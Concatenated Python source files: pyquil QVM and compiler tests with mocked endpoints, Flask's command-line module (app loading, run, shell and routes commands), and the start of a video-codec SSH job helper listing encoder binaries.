qvm.run_and_measure(EMPTY_PROGRAM, [0])
WAVEFUNCTION_BINARY = (
b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\xe6\xa0\x9ef"
b"\x7f;\xcc\x00\x00\x00\x00\x00\x00\x00\x00\xbf\xe6\xa0\x9ef\x7f;\xcc\x00"
b"\x00\x00\x00\x00\x00\x00\x00"
)
WAVEFUNCTION_PROGRAM = Program(
Declare("ro", "BIT"), H(0), CNOT(0, 1), MEASURE(0, MemoryReference("ro")), H(0)
)
def test_sync_expectation_mock(qvm: QVMConnection):
mock_qvm = qvm
mock_endpoint = mock_qvm.sync_endpoint
def mock_response(request, context):
assert json.loads(request.text) == {
"type": "expectation",
"state-preparation": BELL_STATE.out(),
"operators": ["Z 0\n", "Z 1\n", "Z 0\nZ 1\n"],
"rng-seed": 52,
}
return b"[0.0, 0.0, 1.0]"
with requests_mock.Mocker() as m:
m.post(mock_endpoint + "/qvm", content=mock_response)
result = mock_qvm.expectation(
BELL_STATE, [Program(Z(0)), Program(Z(1)), Program(Z(0), Z(1))]
)
exp_expected = [0.0, 0.0, 1.0]
np.testing.assert_allclose(exp_expected, result)
with requests_mock.Mocker() as m:
m.post(mock_endpoint + "/qvm", content=mock_response)
z0 = PauliTerm("Z", 0)
z1 = PauliTerm("Z", 1)
z01 = z0 * z1
result = mock_qvm.pauli_expectation(BELL_STATE, [z0, z1, z01])
exp_expected = [0.0, 0.0, 1.0]
np.testing.assert_allclose(exp_expected, result)
def test_sync_expectation(qvm):
result = qvm.expectation(BELL_STATE, [Program(Z(0)), Program(Z(1)), Program(Z(0), Z(1))])
exp_expected = [0.0, 0.0, 1.0]
np.testing.assert_allclose(exp_expected, result)
def test_sync_expectation_2(qvm):
z0 = PauliTerm("Z", 0)
z1 = PauliTerm("Z", 1)
z01 = z0 * z1
result = qvm.pauli_expectation(BELL_STATE, [z0, z1, z01])
exp_expected = [0.0, 0.0, 1.0]
np.testing.assert_allclose(exp_expected, result)
def test_sync_paulisum_expectation(qvm: QVMConnection):
mock_qvm = qvm
mock_endpoint = mock_qvm.sync_endpoint
def mock_response(request, context):
assert json.loads(request.text) == {
"type": "expectation",
"state-preparation": BELL_STATE.out(),
"operators": ["Z 0\nZ 1\n", "Z 0\n", "Z 1\n"],
"rng-seed": 52,
}
return b"[1.0, 0.0, 0.0]"
with requests_mock.Mocker() as m:
m.post(mock_endpoint + "/qvm", content=mock_response)
z0 = PauliTerm("Z", 0)
z1 = PauliTerm("Z", 1)
z01 = z0 * z1
result = mock_qvm.pauli_expectation(BELL_STATE, 1j * z01 + z0 + z1)
exp_expected = 1j
np.testing.assert_allclose(exp_expected, result)
def test_sync_wavefunction(qvm):
qvm.random_seed = 0 # this test uses a stochastic program and assumes we measure 0
result = qvm.wavefunction(WAVEFUNCTION_PROGRAM)
wf_expected = np.array([0.0 + 0.0j, 0.0 + 0.0j, 0.70710678 + 0.0j, -0.70710678 + 0.0j])
np.testing.assert_allclose(result.amplitudes, wf_expected)
def test_validate_noise_probabilities():
with pytest.raises(TypeError):
validate_noise_probabilities(1)
with pytest.raises(TypeError):
validate_noise_probabilities(["a", "b", "c"])
with pytest.raises(ValueError):
validate_noise_probabilities([0.0, 0.0, 0.0, 0.0])
with pytest.raises(ValueError):
validate_noise_probabilities([0.5, 0.5, 0.5])
with pytest.raises(ValueError):
validate_noise_probabilities([-0.5, -0.5, -0.5])
def test_validate_qubit_list():
with pytest.raises(TypeError):
validate_qubit_list([-1, 1])
with pytest.raises(TypeError):
validate_qubit_list(["a", 0], 1)
def test_prepare_register_list():
with pytest.raises(TypeError):
prepare_register_list({"ro": [-1, 1]})
# ---------------------
# compiler-server tests
# ---------------------
def test_get_qc_returns_remote_qvm_compiler(qvm: QVMConnection, compiler: QVMCompiler):
with patch.dict("os.environ", {"COMPILER_URL": "tcp://192.168.0.0:5550"}):
qc = get_qc("9q-square-qvm")
assert isinstance(qc.compiler, QVMCompiler)
mock_qpu_compiler_server = Server()
@mock_qpu_compiler_server.rpc_handler
def native_quil_to_binary(payload: BinaryExecutableRequest) -> BinaryExecutableResponse:
assert Program(payload.quil).out() == COMPILED_BELL_STATE.out()
time.sleep(0.1)
return BinaryExecutableResponse(program=COMPILED_BYTES_ARRAY)
@mock_qpu_compiler_server.rpc_handler
def get_version_info() -> str:
return "1.8.1"
@pytest.fixture
def m_endpoints():
return "tcp://127.0.0.1:5550", "tcp://*:5550"
def run_mock(_, endpoint):
# Need a new event loop for a new process
mock_qpu_compiler_server.run(endpoint, loop=asyncio.new_event_loop())
@pytest.fixture
def server(request, m_endpoints):
proc = Process(target=run_mock, args=m_endpoints)
proc.start()
yield proc
os.kill(proc.pid, signal.SIGINT)
@pytest.fixture
def mock_qpu_compiler(request, m_endpoints, compiler: QVMCompiler):
return QPUCompiler(
quilc_endpoint=compiler.client.endpoint,
qpu_compiler_endpoint=m_endpoints[0],
device=NxDevice(nx.Graph([(0, 1)])),
)
def test_quil_to_native_quil(compiler):
response = compiler.quil_to_native_quil(BELL_STATE)
print(response)
assert response.out() == COMPILED_BELL_STATE.out()
def test_native_quil_to_binary(server, mock_qpu_compiler):
p = COMPILED_BELL_STATE.copy()
p.wrap_in_numshots_loop(10)
# `native_quil_to_executable` will warn us that we haven't constructed our
# program via `quil_to_native_quil`.
with pytest.warns(UserWarning):
response = mock_qpu_compiler.native_quil_to_executable(p)
assert response.program == COMPILED_BYTES_ARRAY
def test_local_rb_sequence(benchmarker):
response = benchmarker.generate_rb_sequence(2, [PHASE(np.pi / 2, 0), H(0)], seed=52)
assert [prog.out() for prog in response] == [
"H 0\nPHASE(pi/2) 0\nH 0\nPHASE(pi/2) 0\nPHASE(pi/2) 0\n",
"H 0\nPHASE(pi/2) 0\nH 0\nPHASE(pi/2) 0\nPHASE(pi/2) 0\n",
]
def test_local_conjugate_request(benchmarker):
response = benchmarker.apply_clifford_to_pauli(Program("H 0"), PauliTerm("X", 0, 1.0))
assert isinstance(response, PauliTerm)
assert str(response) == "(1+0j)*Z0"
def test_apply_clifford_to_pauli(benchmarker):
response = benchmarker.apply_clifford_to_pauli(Program("H 0"), PauliTerm("I", 0, 0.34))
assert response == PauliTerm("I", 0, 0.34)
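# --- Editor's sketch (hedged; not part of the upstream pyquil test suite) ---
# Rebuilds the BELL_STATE_MEASURE program defined near the top of this file
# step by step, to make the incremental Program construction pattern explicit.
# It only uses names already imported in this file and never contacts a QVM.
def _example_build_bell_state_program():
    prog = Program(Declare("ro", "BIT", 2))   # classical register for the results
    prog += H(0)                              # put qubit 0 into superposition
    prog += CNOT(0, 1)                        # entangle qubits 0 and 1
    prog += MEASURE(0, MemoryReference("ro", 0))
    prog += MEASURE(1, MemoryReference("ro", 1))
    return prog.out()                         # Quil text, comparable to BELL_STATE_MEASURE.out()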
|
cli.py
|
# -*- coding: utf-8 -*-
"""
flask.cli
~~~~~~~~~
A simple command line application to run flask apps.
:copyright: © 2010 by the Pallets team.
:license: BSD, see LICENSE for more details.
"""
from __future__ import print_function
import ast
import inspect
import os
import platform
import re
import ssl
import sys
import traceback
from functools import update_wrapper
from operator import attrgetter
from threading import Lock, Thread
import click
from werkzeug.utils import import_string
from . import __version__
from ._compat import getargspec, itervalues, reraise, text_type
from .globals import current_app
from .helpers import get_debug_flag, get_env, get_load_dotenv
try:
import dotenv
except ImportError:
dotenv = None
class NoAppException(click.UsageError):
"""Raised if an application cannot be found or loaded."""
def find_best_app(script_info, module):
"""Given a module instance this tries to find the best possible
application in the module or raises an exception.
"""
from . import Flask
# Search for the most common names first.
for attr_name in ("app", "application"):
app = getattr(module, attr_name, None)
if isinstance(app, Flask):
return app
# Otherwise find the only object that is a Flask instance.
matches = [v for v in itervalues(module.__dict__) if isinstance(v, Flask)]
if len(matches) == 1:
return matches[0]
elif len(matches) > 1:
raise NoAppException(
'Detected multiple Flask applications in module "{module}". Use '
'"FLASK_APP={module}:name" to specify the correct '
"one.".format(module=module.__name__)
)
# Search for app factory functions.
for attr_name in ("create_app", "make_app"):
app_factory = getattr(module, attr_name, None)
if inspect.isfunction(app_factory):
try:
app = call_factory(script_info, app_factory)
if isinstance(app, Flask):
return app
except TypeError:
if not _called_with_wrong_args(app_factory):
raise
raise NoAppException(
'Detected factory "{factory}" in module "{module}", but '
"could not call it without arguments. Use "
"\"FLASK_APP='{module}:{factory}(args)'\" to specify "
"arguments.".format(factory=attr_name, module=module.__name__)
)
raise NoAppException(
'Failed to find Flask application or factory in module "{module}". '
'Use "FLASK_APP={module}:name to specify one.'.format(module=module.__name__)
)
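# --- Editor's sketch (hedged; not part of Flask) ---------------------------
# find_best_app() above looks for an attribute named "app"/"application",
# then for a single Flask instance, then for a "create_app"/"make_app"
# factory.  The throwaway module built here (name "hello" is an assumption)
# is resolved through the first rule, just as "FLASK_APP=hello" would be.
def _example_find_best_app(script_info):
    import types
    from flask import Flask
    fake_module = types.ModuleType("hello")   # stand-in for a user's hello.py
    fake_module.app = Flask("hello")
    return find_best_app(script_info, fake_module)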
def call_factory(script_info, app_factory, arguments=()):
"""Takes an app factory, a ``script_info` object and optionally a tuple
of arguments. Checks for the existence of a script_info argument and calls
the app_factory depending on that and the arguments provided.
"""
args_spec = getargspec(app_factory)
arg_names = args_spec.args
arg_defaults = args_spec.defaults
if "script_info" in arg_names:
return app_factory(*arguments, script_info=script_info)
elif arguments:
return app_factory(*arguments)
elif not arguments and len(arg_names) == 1 and arg_defaults is None:
return app_factory(script_info)
return app_factory()
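# --- Editor's sketch (hedged; not part of Flask) ---------------------------
# call_factory() above passes ``script_info`` only when the factory asks for
# it.  The two toy factories below (their names are assumptions) exercise
# both dispatch paths.
def _example_call_factory_dispatch(script_info):
    from flask import Flask
    def make_app_plain():                     # no script_info parameter
        return Flask("plain")
    def make_app_aware(script_info):          # single bare argument -> receives script_info
        return Flask("aware")
    plain = call_factory(script_info, make_app_plain)   # called with no arguments
    aware = call_factory(script_info, make_app_aware)   # called as make_app_aware(script_info)
    return plain, aware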
def _called_with_wrong_args(factory):
"""Check whether calling a function raised a ``TypeError`` because
the call failed or because something in the factory raised the
error.
:param factory: the factory function that was called
:return: true if the call failed
"""
tb = sys.exc_info()[2]
try:
while tb is not None:
if tb.tb_frame.f_code is factory.__code__:
# in the factory, it was called successfully
return False
tb = tb.tb_next
# didn't reach the factory
return True
finally:
del tb
def find_app_by_string(script_info, module, app_name):
"""Checks if the given string is a variable name or a function. If it is a
function, it checks for specified arguments and whether it takes a
``script_info`` argument and calls the function with the appropriate
arguments.
"""
from flask import Flask
match = re.match(r"^ *([^ ()]+) *(?:\((.*?) *,? *\))? *$", app_name)
if not match:
raise NoAppException(
'"{name}" is not a valid variable name or function '
"expression.".format(name=app_name)
)
name, args = match.groups()
try:
attr = getattr(module, name)
except AttributeError as e:
raise NoAppException(e.args[0])
if inspect.isfunction(attr):
if args:
try:
args = ast.literal_eval("({args},)".format(args=args))
except (ValueError, SyntaxError) as e:
raise NoAppException(
"Could not parse the arguments in "
'"{app_name}".'.format(e=e, app_name=app_name)
)
else:
args = ()
try:
app = call_factory(script_info, attr, args)
except TypeError as e:
if not _called_with_wrong_args(attr):
raise
raise NoAppException(
'{e}\nThe factory "{app_name}" in module "{module}" could not '
"be called with the specified arguments.".format(
e=e, app_name=app_name, module=module.__name__
)
)
else:
app = attr
if isinstance(app, Flask):
return app
raise NoAppException(
"A valid Flask application was not obtained from "
'"{module}:{app_name}".'.format(module=module.__name__, app_name=app_name)
)
def prepare_import(path):
"""Given a filename this will try to calculate the python path, add it
to the search path and return the actual module name that is expected.
"""
path = os.path.realpath(path)
fname, ext = os.path.splitext(path)
if ext == ".py":
path = fname
if os.path.basename(path) == "__init__":
path = os.path.dirname(path)
module_name = []
# move up until outside package structure (no __init__.py)
while True:
path, name = os.path.split(path)
module_name.append(name)
if not os.path.exists(os.path.join(path, "__init__.py")):
break
if sys.path[0] != path:
sys.path.insert(0, path)
return ".".join(module_name[::-1])
def locate_app(script_info, module_name, app_name, raise_if_not_found=True):
__traceback_hide__ = True
try:
__import__(module_name)
except ImportError:
# Reraise the ImportError if it occurred within the imported module.
# Determine this by checking whether the trace has a depth > 1.
if sys.exc_info()[-1].tb_next:
raise NoAppException(
'While importing "{name}", an ImportError was raised:'
"\n\n{tb}".format(name=module_name, tb=traceback.format_exc())
)
elif raise_if_not_found:
raise NoAppException('Could not import "{name}".'.format(name=module_name))
else:
return
module = sys.modules[module_name]
if app_name is None:
return find_best_app(script_info, module)
else:
return find_app_by_string(script_info, module, app_name)
def get_version(ctx, param, value):
if not value or ctx.resilient_parsing:
return
import werkzeug
message = "Python %(python)s\n" "Flask %(flask)s\n" "Werkzeug %(werkzeug)s"
click.echo(
message
% {
"python": platform.python_version(),
"flask": __version__,
"werkzeug": werkzeug.__version__,
},
color=ctx.color,
)
ctx.exit()
version_option = click.Option(
["--version"],
help="Show the flask version",
expose_value=False,
callback=get_version,
is_flag=True,
is_eager=True,
)
class DispatchingApp(object):
"""Special application that dispatches to a Flask application which
is imported by name in a background thread. If an error happens
it is recorded and shown as part of the WSGI handling which in case
of the Werkzeug debugger means that it shows up in the browser.
"""
def __init__(self, loader, use_eager_loading=False):
self.loader = loader
self._app = None
self._lock = Lock()
self._bg_loading_exc_info = None
if use_eager_loading:
self._load_unlocked()
else:
self._load_in_background()
def _load_in_background(self):
def _load_app():
__traceback_hide__ = True
with self._lock:
try:
self._load_unlocked()
except Exception:
self._bg_loading_exc_info = sys.exc_info()
t = Thread(target=_load_app, args=())
t.start()
def _flush_bg_loading_exception(self):
__traceback_hide__ = True
exc_info = self._bg_loading_exc_info
if exc_info is not None:
self._bg_loading_exc_info = None
reraise(*exc_info)
def _load_unlocked(self):
__traceback_hide__ = True
self._app = rv = self.loader()
self._bg_loading_exc_info = None
return rv
def __call__(self, environ, start_response):
__traceback_hide__ = True
if self._app is not None:
return self._app(environ, start_response)
self._flush_bg_loading_exception()
with self._lock:
if self._app is not None:
rv = self._app
else:
rv = self._load_unlocked()
return rv(environ, start_response)
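# --- Editor's sketch (hedged; not part of Flask) ---------------------------
# DispatchingApp above defers the (possibly slow) application import to a
# background thread so the WSGI server can start serving before the import
# finishes.  The loader below -- any zero-argument callable returning a
# Flask app -- is an illustrative assumption.
def _example_dispatching_app():
    from flask import Flask
    def loader():
        return Flask("lazy")
    lazy = DispatchingApp(loader)                            # import happens in a background thread
    eager = DispatchingApp(loader, use_eager_loading=True)   # or load synchronously up front
    return lazy, eager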
class ScriptInfo(object):
"""Helper object to deal with Flask applications. This is usually not
necessary to interface with as it's used internally in the dispatching
to click. In future versions of Flask this object will most likely play
a bigger role. Typically it's created automatically by the
:class:`FlaskGroup` but you can also manually create it and pass it
    onwards as a click object.
"""
def __init__(self, app_import_path=None, create_app=None, set_debug_flag=True):
#: Optionally the import path for the Flask application.
self.app_import_path = app_import_path or os.environ.get("FLASK_APP")
#: Optionally a function that is passed the script info to create
#: the instance of the application.
self.create_app = create_app
#: A dictionary with arbitrary data that can be associated with
#: this script info.
self.data = {}
self.set_debug_flag = set_debug_flag
self._loaded_app = None
def load_app(self):
"""Loads the Flask app (if not yet loaded) and returns it. Calling
        this multiple times will just return the already loaded app.
"""
__traceback_hide__ = True
if self._loaded_app is not None:
return self._loaded_app
app = None
if self.create_app is not None:
app = call_factory(self, self.create_app)
else:
if self.app_import_path:
path, name = (
re.split(r":(?![\\/])", self.app_import_path, 1) + [None]
)[:2]
import_name = prepare_import(path)
app = locate_app(self, import_name, name)
else:
for path in ("wsgi.py", "app.py"):
import_name = prepare_import(path)
app = locate_app(self, import_name, None, raise_if_not_found=False)
if app:
break
if not app:
raise NoAppException(
"Could not locate a Flask application. You did not provide "
'the "FLASK_APP" environment variable, and a "wsgi.py" or '
'"app.py" module was not found in the current directory.'
)
if self.set_debug_flag:
# Update the app's debug flag through the descriptor so that
# other values repopulate as well.
app.debug = get_debug_flag()
self._loaded_app = app
return app
pass_script_info = click.make_pass_decorator(ScriptInfo, ensure=True)
def with_appcontext(f):
"""Wraps a callback so that it's guaranteed to be executed with the
script's application context. If callbacks are registered directly
to the ``app.cli`` object then they are wrapped with this function
by default unless it's disabled.
"""
@click.pass_context
def decorator(__ctx, *args, **kwargs):
with __ctx.ensure_object(ScriptInfo).load_app().app_context():
return __ctx.invoke(f, *args, **kwargs)
return update_wrapper(decorator, f)
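# --- Editor's sketch (hedged; not part of Flask) ---------------------------
# with_appcontext() above pushes an application context before the wrapped
# callback runs, which is what makes ``current_app`` usable inside it.  The
# command name "whoami" is an assumption; the command is not registered with
# any group here.
@click.command("whoami")
@with_appcontext
def _example_whoami_command():
    click.echo(current_app.name)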
class AppGroup(click.Group):
"""This works similar to a regular click :class:`~click.Group` but it
changes the behavior of the :meth:`command` decorator so that it
automatically wraps the functions in :func:`with_appcontext`.
Not to be confused with :class:`FlaskGroup`.
"""
def command(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it wraps callbacks in :func:`with_appcontext`
unless it's disabled by passing ``with_appcontext=False``.
"""
wrap_for_ctx = kwargs.pop("with_appcontext", True)
def decorator(f):
if wrap_for_ctx:
f = with_appcontext(f)
return click.Group.command(self, *args, **kwargs)(f)
return decorator
def group(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it defaults the group class to
:class:`AppGroup`.
"""
kwargs.setdefault("cls", AppGroup)
return click.Group.group(self, *args, **kwargs)
class FlaskGroup(AppGroup):
"""Special subclass of the :class:`AppGroup` group that supports
loading more commands from the configured Flask app. Normally a
developer does not have to interface with this class but there are
some very advanced use cases for which it makes sense to create an
instance of this.
    For information on why this is useful see :ref:`custom-scripts`.
:param add_default_commands: if this is True then the default run and
        shell commands will be added.
:param add_version_option: adds the ``--version`` option.
:param create_app: an optional callback that is passed the script info and
returns the loaded app.
:param load_dotenv: Load the nearest :file:`.env` and :file:`.flaskenv`
files to set environment variables. Will also change the working
directory to the directory containing the first file found.
:param set_debug_flag: Set the app's debug flag based on the active
environment
.. versionchanged:: 1.0
If installed, python-dotenv will be used to load environment variables
from :file:`.env` and :file:`.flaskenv` files.
"""
def __init__(
self,
add_default_commands=True,
create_app=None,
add_version_option=True,
load_dotenv=True,
set_debug_flag=True,
**extra
):
params = list(extra.pop("params", None) or ())
if add_version_option:
params.append(version_option)
AppGroup.__init__(self, params=params, **extra)
self.create_app = create_app
self.load_dotenv = load_dotenv
self.set_debug_flag = set_debug_flag
if add_default_commands:
self.add_command(run_command)
self.add_command(shell_command)
self.add_command(routes_command)
self._loaded_plugin_commands = False
def _load_plugin_commands(self):
if self._loaded_plugin_commands:
return
try:
import pkg_resources
except ImportError:
self._loaded_plugin_commands = True
return
for ep in pkg_resources.iter_entry_points("flask.commands"):
self.add_command(ep.load(), ep.name)
self._loaded_plugin_commands = True
def get_command(self, ctx, name):
self._load_plugin_commands()
# We load built-in commands first as these should always be the
# same no matter what the app does. If the app does want to
# override this it needs to make a custom instance of this group
# and not attach the default commands.
#
# This also means that the script stays functional in case the
# application completely fails.
rv = AppGroup.get_command(self, ctx, name)
if rv is not None:
return rv
info = ctx.ensure_object(ScriptInfo)
try:
rv = info.load_app().cli.get_command(ctx, name)
if rv is not None:
return rv
except NoAppException:
pass
def list_commands(self, ctx):
self._load_plugin_commands()
# The commands available is the list of both the application (if
# available) plus the builtin commands.
rv = set(click.Group.list_commands(self, ctx))
info = ctx.ensure_object(ScriptInfo)
try:
rv.update(info.load_app().cli.list_commands(ctx))
except Exception:
# Here we intentionally swallow all exceptions as we don't
# want the help page to break if the app does not exist.
# If someone attempts to use the command we try to create
# the app again and this will give us the error.
# However, we will not do so silently because that would confuse
# users.
traceback.print_exc()
return sorted(rv)
def main(self, *args, **kwargs):
# Set a global flag that indicates that we were invoked from the
# command line interface. This is detected by Flask.run to make the
# call into a no-op. This is necessary to avoid ugly errors when the
# script that is loaded here also attempts to start a server.
os.environ["FLASK_RUN_FROM_CLI"] = "true"
if get_load_dotenv(self.load_dotenv):
load_dotenv()
obj = kwargs.get("obj")
if obj is None:
obj = ScriptInfo(
create_app=self.create_app, set_debug_flag=self.set_debug_flag
)
kwargs["obj"] = obj
kwargs.setdefault("auto_envvar_prefix", "FLASK")
return super(FlaskGroup, self).main(*args, **kwargs)
def _path_is_ancestor(path, other):
"""Take ``other`` and remove the length of ``path`` from it. Then join it
to ``path``. If it is the original value, ``path`` is an ancestor of
``other``."""
return os.path.join(path, other[len(path) :].lstrip(os.sep)) == other
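# --- Editor's sketch (hedged; not part of Flask): _path_is_ancestor() above
# in action, with POSIX-style example paths that are assumptions.
def _example_path_is_ancestor():
    assert _path_is_ancestor("/srv/project", "/srv/project/instance")
    assert not _path_is_ancestor("/srv/project", "/srv/other")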
def load_dotenv(path=None):
"""Load "dotenv" files in order of precedence to set environment variables.
If an env var is already set it is not overwritten, so earlier files in the
list are preferred over later files.
Changes the current working directory to the location of the first file
found, with the assumption that it is in the top level project directory
and will be where the Python path should import local packages from.
This is a no-op if `python-dotenv`_ is not installed.
.. _python-dotenv: https://github.com/theskumar/python-dotenv#readme
:param path: Load the file at this location instead of searching.
:return: ``True`` if a file was loaded.
.. versionchanged:: 1.1.0
Returns ``False`` when python-dotenv is not installed, or when
the given path isn't a file.
.. versionadded:: 1.0
"""
if dotenv is None:
if path or os.path.isfile(".env") or os.path.isfile(".flaskenv"):
click.secho(
" * Tip: There are .env or .flaskenv files present."
' Do "pip install python-dotenv" to use them.',
fg="yellow",
)
return False
# if the given path specifies the actual file then return True,
# else False
if path is not None:
if os.path.isfile(path):
return dotenv.load_dotenv(path)
return False
new_dir = None
for name in (".env", ".flaskenv"):
path = dotenv.find_dotenv(name, usecwd=True)
if not path:
continue
if new_dir is None:
new_dir = os.path.dirname(path)
dotenv.load_dotenv(path)
if new_dir and os.getcwd() != new_dir:
os.chdir(new_dir)
return new_dir is not None # at least one file was located and loaded
def show_server_banner(env, debug, app_import_path, eager_loading):
"""Show extra startup messages the first time the server is run,
ignoring the reloader.
"""
if os.environ.get("WERKZEUG_RUN_MAIN") == "true":
return
if app_import_path is not None:
message = ' * Serving Flask app "{0}"'.format(app_import_path)
if not eager_loading:
message += " (lazy loading)"
click.echo(message)
click.echo(" * Environment: {0}".format(env))
if env == "production":
click.secho(
" WARNING: This is a development server. "
"Do not use it in a production deployment.",
fg="red",
)
click.secho(" Use a production WSGI server instead.", dim=True)
if debug is not None:
click.echo(" * Debug mode: {0}".format("on" if debug else "off"))
class CertParamType(click.ParamType):
"""Click option type for the ``--cert`` option. Allows either an
existing file, the string ``'adhoc'``, or an import for a
:class:`~ssl.SSLContext` object.
"""
name = "path"
def __init__(self):
self.path_type = click.Path(exists=True, dir_okay=False, resolve_path=True)
def convert(self, value, param, ctx):
try:
return self.path_type(value, param, ctx)
except click.BadParameter:
value = click.STRING(value, param, ctx).lower()
if value == "adhoc":
try:
import OpenSSL
except ImportError:
raise click.BadParameter(
"Using ad-hoc certificates requires pyOpenSSL.", ctx, param
)
return value
obj = import_string(value, silent=True)
if sys.version_info < (2, 7, 9):
if obj:
return obj
else:
if isinstance(obj, ssl.SSLContext):
return obj
raise
def _validate_key(ctx, param, value):
"""The ``--key`` option must be specified when ``--cert`` is a file.
Modifies the ``cert`` param to be a ``(cert, key)`` pair if needed.
"""
cert = ctx.params.get("cert")
is_adhoc = cert == "adhoc"
if sys.version_info < (2, 7, 9):
is_context = cert and not isinstance(cert, (text_type, bytes))
else:
is_context = isinstance(cert, ssl.SSLContext)
if value is not None:
if is_adhoc:
raise click.BadParameter(
'When "--cert" is "adhoc", "--key" is not used.', ctx, param
)
if is_context:
raise click.BadParameter(
'When "--cert" is an SSLContext object, "--key is not used.', ctx, param
)
if not cert:
raise click.BadParameter('"--cert" must also be specified.', ctx, param)
ctx.params["cert"] = cert, value
else:
if cert and not (is_adhoc or is_context):
raise click.BadParameter('Required when using "--cert".', ctx, param)
return value
class SeparatedPathType(click.Path):
"""Click option type that accepts a list of values separated by the
OS's path separator (``:``, ``;`` on Windows). Each value is
validated as a :class:`click.Path` type.
"""
def convert(self, value, param, ctx):
items = self.split_envvar_value(value)
super_convert = super(SeparatedPathType, self).convert
return [super_convert(item, param, ctx) for item in items]
@click.command("run", short_help="Run a development server.")
@click.option("--host", "-h", default="127.0.0.1", help="The interface to bind to.")
@click.option("--port", "-p", default=5000, help="The port to bind to.")
@click.option(
"--cert", type=CertParamType(), help="Specify a certificate file to use HTTPS."
)
@click.option(
"--key",
type=click.Path(exists=True, dir_okay=False, resolve_path=True),
callback=_validate_key,
expose_value=False,
help="The key file to use when specifying a certificate.",
)
@click.option(
"--reload/--no-reload",
default=None,
help="Enable or disable the reloader. By default the reloader "
"is active if debug is enabled.",
)
@click.option(
"--debugger/--no-debugger",
default=None,
help="Enable or disable the debugger. By default the debugger "
"is active if debug is enabled.",
)
@click.option(
"--eager-loading/--lazy-loader",
default=None,
help="Enable or disable eager loading. By default eager "
"loading is enabled if the reloader is disabled.",
)
@click.option(
"--with-threads/--without-threads",
default=True,
help="Enable or disable multithreading.",
)
@click.option(
"--extra-files",
default=None,
type=SeparatedPathType(),
help=(
"Extra files that trigger a reload on change. Multiple paths"
" are separated by '{}'.".format(os.path.pathsep)
),
)
@pass_script_info
def run_command(
info, host, port, reload, debugger, eager_loading, with_threads, cert, extra_files
):
"""Run a local development server.
This server is for development purposes only. It does not provide
the stability, security, or performance of production WSGI servers.
The reloader and debugger are enabled by default if
FLASK_ENV=development or FLASK_DEBUG=1.
"""
debug = get_debug_flag()
if reload is None:
reload = debug
if debugger is None:
debugger = debug
if eager_loading is None:
eager_loading = not reload
show_server_banner(get_env(), debug, info.app_import_path, eager_loading)
app = DispatchingApp(info.load_app, use_eager_loading=eager_loading)
from werkzeug.serving import run_simple
run_simple(
host,
port,
app,
use_reloader=reload,
use_debugger=debugger,
threaded=with_threads,
ssl_context=cert,
extra_files=extra_files,
)
@click.command("shell", short_help="Run a shell in the app context.")
@with_appcontext
def shell_command():
"""Run an interactive Python shell in the context of a given
Flask application. The application will populate the default
    namespace of this shell according to its configuration.
This is useful for executing small snippets of management code
without having to manually configure the application.
"""
import code
from flask.globals import _app_ctx_stack
app = _app_ctx_stack.top.app
banner = "Python %s on %s\nApp: %s [%s]\nInstance: %s" % (
sys.version,
sys.platform,
app.import_name,
app.env,
app.instance_path,
)
ctx = {}
# Support the regular Python interpreter startup script if someone
# is using it.
startup = os.environ.get("PYTHONSTARTUP")
if startup and os.path.isfile(startup):
with open(startup, "r") as f:
eval(compile(f.read(), startup, "exec"), ctx)
ctx.update(app.make_shell_context())
code.interact(banner=banner, local=ctx)
@click.command("routes", short_help="Show the routes for the app.")
@click.option(
"--sort",
"-s",
type=click.Choice(("endpoint", "methods", "rule", "match")),
default="endpoint",
help=(
'Method to sort routes by. "match" is the order that Flask will match '
"routes when dispatching a request."
),
)
@click.option("--all-methods", is_flag=True, help="Show HEAD and OPTIONS methods.")
@with_appcontext
def routes_command(sort, all_methods):
"""Show all registered routes with endpoints and methods."""
rules = list(current_app.url_map.iter_rules())
if not rules:
click.echo("No routes were registered.")
return
ignored_methods = set(() if all_methods else ("HEAD", "OPTIONS"))
if sort in ("endpoint", "rule"):
rules = sorted(rules, key=attrgetter(sort))
elif sort == "methods":
rules = sorted(rules, key=lambda rule: sorted(rule.methods))
rule_methods = [", ".join(sorted(rule.methods - ignored_methods)) for rule in rules]
headers = ("Endpoint", "Methods", "Rule")
widths = (
max(len(rule.endpoint) for rule in rules),
max(len(methods) for methods in rule_methods),
max(len(rule.rule) for rule in rules),
)
widths = [max(len(h), w) for h, w in zip(headers, widths)]
row = "{{0:<{0}}} {{1:<{1}}} {{2:<{2}}}".format(*widths)
click.echo(row.format(*headers).strip())
click.echo(row.format(*("-" * width for width in widths)))
for rule, methods in zip(rules, rule_methods):
click.echo(row.format(rule.endpoint, methods, rule.rule).rstrip())
cli = FlaskGroup(
help="""\
A general utility script for Flask applications.
Provides commands from Flask, extensions, and the application. Loads the
application defined in the FLASK_APP environment variable, or from a wsgi.py
file. Setting the FLASK_ENV environment variable to 'development' will enable
debug mode.
\b
{prefix}{cmd} FLASK_APP=hello.py
{prefix}{cmd} FLASK_ENV=development
{prefix}flask run
""".format(
cmd="export" if os.name == "posix" else "set",
prefix="$ " if os.name == "posix" else "> ",
)
)
def main(as_module=False):
cli.main(prog_name="python -m flask" if as_module else None)
if __name__ == "__main__":
main(as_module=True)
|
sshslot.py
|
from utility import *
import subprocess
import sys
import os
import threading
import time
ssh_privkey_file = os.getenv("SSH_PRIVKEY_FILE", "daala.pem")
binaries = {
'daala':['examples/encoder_example','examples/dump_video'],
'x264': ['x264'],
'x264-rt': ['x264'],
'x265': ['build/linux/x265'],
'x265-rt': ['build/linux/x265'],
'xvc': ['build/app/xvcenc', 'build/app/xvcdec'],
'vp8': ['vpxenc','vpxdec'],
'vp9': ['vpxenc','vpxdec'],
'vp9-rt': ['vpxenc','vpxdec'],
'vp10': ['vpxenc','vpxdec'],
'vp10-rt': ['vpxenc','vpxdec'],
'av1': ['aomenc','aomdec'],
'av1-rt': ['aomenc','aomdec'],
'thor': ['build/Thorenc','build/Thordec','config_HDB16_high_efficiency.txt','config_LDB_high_efficiency.txt'],
'thor-rt': ['build/Thorenc','build/Thordec','config_HDB16_high_efficiency.txt','config_LDB_high_efficiency.txt'],
'rav1e': ['target/release/rav1e'],
'svt-av1': ['Bin/Release/SvtAv1EncApp', 'Bin/Release/libSvtAv1Enc.so.0']
}
# Paths such as `this_(that)` must be wrapped in single quotes so the shell
